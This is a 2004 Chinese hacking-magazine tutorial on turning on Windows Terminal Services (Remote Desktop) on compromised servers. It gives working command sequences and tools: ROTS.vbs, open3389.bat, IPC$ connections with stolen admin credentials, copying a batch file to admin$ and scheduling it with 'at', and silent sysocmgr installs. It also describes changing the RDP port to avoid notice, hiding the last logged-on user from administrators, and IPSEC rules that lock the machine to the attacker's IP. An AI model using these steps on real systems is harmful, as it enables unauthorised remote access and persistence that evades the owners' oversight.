上一篇
下一篇
終端服務全攻略
作者:tank 日期:2004-12-28
終端服務全攻略
www.netsill.com 2004-12-27 網嗅安全網
作者:dahubaobao [Nuke Group]
主頁:http://www.ringz.org
團體站點:http://www.digitalnuke.com/main/
郵件:dahushibaobao@vip.sina.com
QQ:47809945
發表于黑客防線2004年1期
工具及圖片都在壓縮包中,解壓密碼:www.ringz.org http://dahubaobao.go.nease.net/Terminating.rar
歡迎進入環形區,一群技術狂熱者的社區,www.ringz.org歡迎你的加入!
=====================================================================
終端服務全攻略
在漏洞不段出現的今天,入侵一臺服務器已經不是什么新鮮事,但凡是入侵成功之后,都想盡辦法來打開終端服務,什么是終端呢?又怎么在遠程打開呢?看完本文,你就會成為一個開“終端的高手”。
什么是終端服務
3389又稱Terminal Service,服務終端。在WindowsNT中最先開始使用的一種終端,在Win2K的Professional版本中不可以安裝,在Server或以上版本才可以安裝這個服務,其服務端口為3389。由于使用簡單,方便等特點,一直受系統管理員的青昧。也正式因為他的簡便,不產生交互式登陸,可以在后臺操作,因此也受到了黑客朋友的喜愛,事實可以說明,現在大多數朋友在入侵之后,都想打開windows終端服務,甚至不惜重啟對方的計算機,也要把終端服務安裝上,由此可見他的普遍性。另,在在XP系統中又叫做“遠程桌面”。
打開終端服務的各種方法
下面進入正題,開始今天的“終端”之旅。(各種工具我會提供)
一, 使用ROTS.VBS腳本
插撥廣告:
1, 什么是VBS
VBScript的全稱是:Microsoft Visual Basic Script Editon.(微軟公司可視化BASIC腳本版). 正如其字面所透露的信息, VBS(VBScript的進一步簡寫)是基于Visual Basic的腳本語言. 我進一步解釋一下, Microsoft Visual Basic是微軟公司出品的一套可視化編程工具, 語法基于Basic. 腳本語言, 就是不編譯成二進制文件, 直接由宿主(host)解釋源代碼并執行, 簡單點說就是你寫的程序不需要編譯成.exe, 而是直接給用戶發送.vbs的源程序, 用戶就能執行了。
知道什么是VBS了,下面開始進行測試。首先你要獲得這臺主機的Administrator權限或Local System權限,具體怎么獲得在這不必討論。先來看看ROTS.VBS幫助.。(見圖1)
ROTS v1.01
Remote Open Terminal services Script, by zzzEVAzzz
Welcome to visite www.isgrey.com
Usage:
cscript c:\scriptpath\ROTS.vbs targetIP username password [port] [/r]
port: default number is 3389.
/r: auto reboot target.
一般的命令格式:ROTS.vbs <目標IP> <用戶名> <密碼> [服務端口] [自動重起選項]。
下面打開本地CMD,輸入:ROTS.vbs XXX.XXX.XX.XXX dahubaobao dahu 3389 /fr
注意:
1,/fr為強制重啟,/r為普通重啟,不要搞混了。
2, 腳本會判斷目標系統類型,如果不是server及以上版本,就會提示你是否要取消。
優點:成功率高。
缺點:必須重新啟動。
二,使用批處理(bat)
open3389.bat,先來看看幫助:(見圖2)
*******************Open3389*********************
使用方法:
open3389.bat ip user password
open3389.bat 目標ip 用戶名 密碼
還是打開CMD,輸入:open3389.bat XXX.XXX.XX.XXX dahubaobao dahu
好了 就這樣來打開3389,bat文件真的很好用,建議大家去學習。
優點:不必重新啟動。
缺點:成功率不高。
三, 使用HBULOT
這個工具要上傳到對方的機器,然后執行,比較麻煩。
C:\>net use \\XXX.XXX.XX.XXX\IPC$ "dahu" /user:"dahubaobao" //建立IPC連接
C:\>copy HBULOT.exe \\ XXX.XXX.XX.XXX \WINNT\admin$ //上傳到對方的systeme32目錄下。
C:\>net use \\XXX.XXX.XX.XXX\IPC$ /del //斷開IPC
然后telent過去,到對方的WINNT\systeme32目錄下,直接運行HBULOT.exe即可(見圖
3)。
---------------------------------------------------------------------------------------------------------------
下面介紹的不需要工具,具體請看我的方法
首先telent過去,然后輸入query user,使用這個命令的前提是安裝終端,如果出現如圖4
的情況,就表明安裝了終端。如果沒有,那就證明沒有安裝,請看我是怎么做的:
C:\> dir c:\sysoc.inf /s //查找sysoc.inf文件的位置
c:\WINNT\inf 的目錄
2003-06-19 12:05 3,458 sysoc.inf
1 個文件 3,458 字節
C:\>dir c:\sysocmgr.* /s //查找組件安裝程序
c:\WINNT\system32 的目錄
1900-10-29 04:00 42,768 sysocmgr.exe
1 個文件 42,768 字節
C:\>echo [Components] > c:\ts
C:\>echo TSEnable = on >> c:\ts
//建立無人職守安裝的參數
C:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\ts /q
開啟3389,并且重新啟動,如果
C:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\ts /q /r
開啟3389,不重新啟動。
如果重新啟動,那等幾分鐘就可以用客戶端連接了,如果沒重新啟動,那就要等對方重新啟動之后,才能連接(看你的耐心嘍)。
----------------------------------------------------------------------------------
在介紹一種很方便的做法,就是做一個bat文件,在本地運行即可,下面是bat的內容
echo [Components] > c:\ts
echo TSEnable = on >> c:\ts
C:\sqlsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\ts /q
net use \\ip\ipc$ dahu /user:dahubaobao
copy 路徑:\xxx.bat \\ip\winnt\admin$
at time 00:00:00 xxx.bat
主機執行之后,會自動重啟,之后就可以利用3389登陸了。
這個bat文件很容易,前兩條語句是“建立無人職守安裝的參數”,第三條是真正的“開啟終端的命令”,第四條是“IPC連接”,第五是“把bat文件copy到對方的winnt\system32目錄下”,最后是用“time獲取時間,然后用at命令啟動。”
(個人推薦這種方法,比較簡單,有點IPC知識的就可以實現。)
修改終端服務端口
這一步很重要,我們辛苦的開啟了終端服務,不能因為“3389”的暴露而前功盡棄,所以端口是必須修改的,先說一下原理,終端服務安裝完成后,會在注冊表中增加兩個鍵,其鍵值分別為16進制的3389,即“0x00000D3D”。現在打開“運行”,輸入“regedit”啟動注冊表編輯器,然后打開HKEY-LOCAL_MACHINE\System\CurrentControlSet\Control\TerminalServer\Wds\Repwd\Tds\Tcp和HKEY-LOCAL_MACHINE\System\CurrentControlSet\Control\TerminalServer\WinStartions\RDP-TCP子鍵,修改“PortNumber”,假如我們修改成8080端口,其鍵值為“1F90”,保存退出,注意,重啟之后才能生效,修改完成之后,會到本地,打開客戶端,輸入:XXX.XXX.XXX.XX:8080,就可以連接了。(見圖5,6)
有的朋友對注冊表不熟悉,更有甚者恐懼注冊表,認為是很難駕御的地方,那好辦,下面介紹一個小工具,可以在命令行下修改端口,看我是怎么做的:還是先來看幫助
=======================================================
Change Local or Remote TermService Port Program
Code By wawa@21cn.Com Http://www.Haowawa.Com
=======================================================
Local Usage: c3389 7358
Remote Usage: c3389 \\192.168.0.1 adminname password 7358
Local Host TermService Port is : 3389
本地修改:c3389 端口
遠程修改:c3389 \\XXX.XXX.XXX.XX Admin用戶 密碼 端口
先來看本地修改:
打開CMD。輸入c3389 post,具體見圖7。
在來看遠程修改:
輸入c3389 \\XXX.XXX.XXX.XX adminname password post。
到這里,端口就修改關閉了。
隱藏上次登陸過的用戶名
在終端安裝完成后,并且你已經登陸過,那么再次登陸就會顯示上次登陸過的用戶名,如果我們添加的帳戶(或克隆)被管理員看到了,那不起疑心才怪呢?所以我們要隱藏登陸過的用戶,要實現隱藏,還是要修改注冊表,具體看我怎么做:在“運行”中輸入“regedit”啟動注冊表編輯器,依次展開:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon子鍵下的DontDisplayLastUserName,默認鍵值為“0”,我們修改為“1”,保存,退出,重新啟動之后生效。見圖8
限制/指定連接終端的地址
現在我們已經給肉雞看了終端,并且修改了端口,還做了一些簡單的維護,但這還是不夠的,假如某人知道了我們修改過的端口就是終端服務,那就掛了,所以還要在肉雞上通過IPSEC這個系統自帶的而且功能非常強大的工具來做一下限制,具體請看我的演示:
1,靜態IP
假如我的IP是111.222.255.255,我們通過設置IPSEC,來讓肉雞上的終端只通過我的連接,而拒絕除了我以外的所有連接,好,就這么辦,先登陸終端,然后打開“管理工具”—“本地安全設置”,設置如下:
首先右鍵點擊“IP安全策略 在本地機器”選擇“創建IP策略”,然后打開了一個向導,即“IP安全策略向導”—“下一步”—“名稱”—“下一步”取消“激活默認響應規則”—“下一步”—“完成”,這是會重新打開一個“新IP安全策略 屬性”(見圖9),取消“使用“添加向導””—“添加”—出現“新規則屬性”—“添加”—出現“IP篩選器列表”—取消“使用“添加向導””—“添加”—出現“篩選器 屬性”,選擇“尋址”標簽,源地址設為‘任何IP地址’,目的地址設為‘我的IP地址’;在選擇“協議”標簽,選擇協議類型設為‘TCP’,設置IP協議端口‘從任意端口’—‘到此端口8080’—“確定”(見圖10,11)--“關閉”—回到“新規則 屬性”—選擇“新IP篩選器列表”—在選“篩選器操作”標簽—取消“使用“添加向導””—“添加”—在“安全措施”標簽下選擇“阻止”—“確定”—“關閉”(見圖12),回到“新規則 屬性”—選中“新篩選器操作”—“關閉”—“關閉”—回到“本地安全設置”—選中“新IP安全策略”—右鍵點擊“指派”(見圖13),好了,總算設置完了,這樣所有的機器就無法連接8080(終端)端口了。
注意:以上都是使用默認的名稱,所以大家在設置的時候注意一下。
由于上邊的設置,把我自己也擋在了外面,這可不是我所想要的,所以,我們還要建立一條規則,允許我的IP 111.222.255.255訪問對方的8080端口,方法如下:
右鍵點擊“新IP安全策略”—“屬性”—不選“使用“添加向導””—出現“新規則 屬性”—“添加”—出現“IP篩選器列表”—不選“使用“添加向導””—“添加”—出現“篩選器 屬性”—選擇“尋址”標簽,設置成如圖14的樣子,在選擇“協議”標簽,設置成如圖12的樣子,然后“確定”—“關閉”—回到“新規則 屬性”—選中“新IP篩選器列表(1)”—在選“篩選器操作”標簽—在選“允許”—“關閉”—“關閉”—回到“本地安全設置”。
(見圖15)
2,動態IP
在中國,擁有靜態IP的人畢竟是少數,大多數朋友還都是撥號,雖然現在ADSL很普遍,但ADSL還是虛擬撥號,即動態IP,所以用上邊的方法設置IPSEC肯定是不行的,所以,現在我們要修改上邊的一條規則,使IPSEC可以通過 特定子網的連接,方法很簡單,其他的都不用改,按照圖16的方法設置就可以了。
后記
通過上面的設置,在肉雞的終端已經“比較”安全了,由于使用IPSEC總感覺很麻煩,所以在上邊的設置中特意取消了“使用“添加向導””,因為這樣可以更直觀一些,并且附上一個IPSEC的動畫教程,希望大家喜歡,本文如有錯誤,還請多多包涵,也可發郵件至 dahushibaobao@vip.sina.com,和我交流。
文章來自: 
引用通告: 
Tags: